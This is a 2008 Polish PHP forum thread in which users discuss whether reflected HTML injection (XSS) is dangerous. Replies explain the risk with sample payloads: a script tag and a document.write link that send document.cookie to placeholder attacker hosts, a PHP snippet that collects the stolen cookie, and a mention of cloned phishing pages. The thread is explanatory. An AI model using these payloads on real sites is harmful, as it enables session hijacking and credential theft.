Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> Html injection - czy może być naprawdę groźne.
Lk_hc
post 12.12.2008, 15:50:27
Post #1





Grupa: Zarejestrowani
Postów: 36
Pomógł: 1
Dołączył: 12.06.2006

Ostrzeżenie: (0%)
-----


Html injection - czy może być naprawdę groźne, jeśli założymy, że zachodzi tylko na danych wyświetlanych jednemu użytkownikowi, tymczasowo (np zapytanie do szukarki). Oczywiste jest że jest destruktywne na forach czy systemach komentarzy bo szpeci, ale czy może być groźne dla serwera / aplikacji?
Go to the top of the page
+Quote Post
Riklaunim
post 12.12.2008, 15:56:34
Post #2





Grupa: Zarejestrowani
Postów: 640
Pomógł: 44
Dołączył: 8.02.2004

Ostrzeżenie: (0%)
-----


tak, można wykraść cookie usera - np. admina tongue.gif


--------------------
Biblioteki: Skrypty, CMS | Kurs PHP | Python
Go to the top of the page
+Quote Post
Lk_hc
post 12.12.2008, 16:05:28
Post #3





Grupa: Zarejestrowani
Postów: 36
Pomógł: 1
Dołączył: 12.06.2006

Ostrzeżenie: (0%)
-----


A to nie jest tak że alertnąć można tylko swoje cookie?
Go to the top of the page
+Quote Post
wookieb
post 12.12.2008, 16:09:13
Post #4





Grupa: Moderatorzy
Postów: 8 989
Pomógł: 1550
Dołączył: 8.08.2008
Skąd: Słupsk/Gdańsk




A jak ktoś sobie zrobi <script src="http://adres_zlodziej.pl/scirpt?c=document.cookie"></script>
to będzie miał cookie tej osoby ktora otworzy strone.


--------------------
Go to the top of the page
+Quote Post
Lk_hc
post 12.12.2008, 16:17:26
Post #5





Grupa: Zarejestrowani
Postów: 36
Pomógł: 1
Dołączył: 12.06.2006

Ostrzeżenie: (0%)
-----


No tak - to zadziała w przypadku forów, komentarzy itd lub jeśli wstrzyknięcie kodu zachodzi przez GET i debil, któremu podeśle się odpowiednio spreparowany URL w niego kliknie. A da się poprzez HTML injection wywołać w jakiś sposób PHP jeśli jest escapowane albo zapodać plik na serwer?
Go to the top of the page
+Quote Post
Riklaunim
post 12.12.2008, 16:56:57
Post #6





Grupa: Zarejestrowani
Postów: 640
Pomógł: 44
Dołączył: 8.02.2004

Ostrzeżenie: (0%)
-----


Ogólnie jeżeli twój kod jest podatny na XSS to jego wartość jest zerowa - niezależnie czy tobie wydaje się że to może być "niegroźne" tongue.gif


--------------------
Biblioteki: Skrypty, CMS | Kurs PHP | Python
Go to the top of the page
+Quote Post
Lk_hc
post 19.12.2008, 15:35:07
Post #7





Grupa: Zarejestrowani
Postów: 36
Pomógł: 1
Dołączył: 12.06.2006

Ostrzeżenie: (0%)
-----


No jasne, że zerowa. Dlatego nie pisze takiego kodu aaevil.gif
Go to the top of the page
+Quote Post
Crozin
post 19.12.2008, 17:29:31
Post #8





Grupa: Zarejestrowani
Postów: 6 476
Pomógł: 1306
Dołączył: 6.08.2006
Skąd: Kraków

Ostrzeżenie: (0%)
-----


Bardzo prosto jest zmylić kogoś, by kliknął w link, któremu uwać nie powinien:
Kod
wejdź na <script type="text/javascript">document.write('<a href="http://mojaStrona.pl/?c=' + escape(document.cookie) + '">http://forum.php.pl/e_t109179.html</a>');</script> i poszukaj...
Przy czym na mojaStrona.pl może dojść do zapisania danych i przekierowania na Temat: e aby ofiara nawet nie była świadoma, że coś jest nie tak. Równie dobrze można też wyświetlić identyczną stronę (jak docelowa), ale wszystkie dane wprowadzone przez użytkownika zapisywać (loginy, hasła itp.)
Go to the top of the page
+Quote Post
in5ane
post 19.12.2008, 17:42:40
Post #9





Grupa: Zarejestrowani
Postów: 1 335
Pomógł: 34
Dołączył: 9.11.2005
Skąd: Wrocław

Ostrzeżenie: (10%)
X----


Trochę nie na temat, ale jak np. odczytać takie COOKIE na stronie złodzieja? Czyli jaki skrypt przechwytujący takie dane?


--------------------
> > > Tworzenie stron < < <
Go to the top of the page
+Quote Post
Crozin
post 19.12.2008, 18:37:41
Post #10





Grupa: Zarejestrowani
Postów: 6 476
Pomógł: 1306
Dołączył: 6.08.2006
Skąd: Kraków

Ostrzeżenie: (0%)
-----


Jeżeli "zły" link wygląda tak jak ten mój post wyżej to na mojastrona.pl w pliku index.php wystarczy to odebrać poprzez
  1. <?php
  2. $cookies = $_GET['c'];
  3. ?>
Oczywiście trzeba jeszcze to odpowiednio przetworzyć, aby otrzymać z tego coś na kształt tablicy $_COOKIE z PHP.
Go to the top of the page
+Quote Post
bełdzio
post 19.12.2008, 20:58:14
Post #11





Grupa: Zarejestrowani
Postów: 690
Pomógł: 81
Dołączył: 6.04.2005
Skąd: Szczecin

Ostrzeżenie: (0%)
-----


tu byłem ;-)

http://www.beldzio.com/niebezpieczenstwo-htmla


--------------------
Go to the top of the page
+Quote Post
piotrooo89
post 19.12.2008, 21:15:05
Post #12


Newsman


Grupa: Moderatorzy
Postów: 4 005
Pomógł: 548
Dołączył: 7.04.2008
Skąd: Trzebinia/Kraków




a jeszcze warto wspomnieć o spam botach które wykorzystują maile na stronie do wysyłania spamu jeśli adres jest nieodpowiednio zdefiniowany. tu coś o tym


--------------------
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 5.07.2025 - 19:36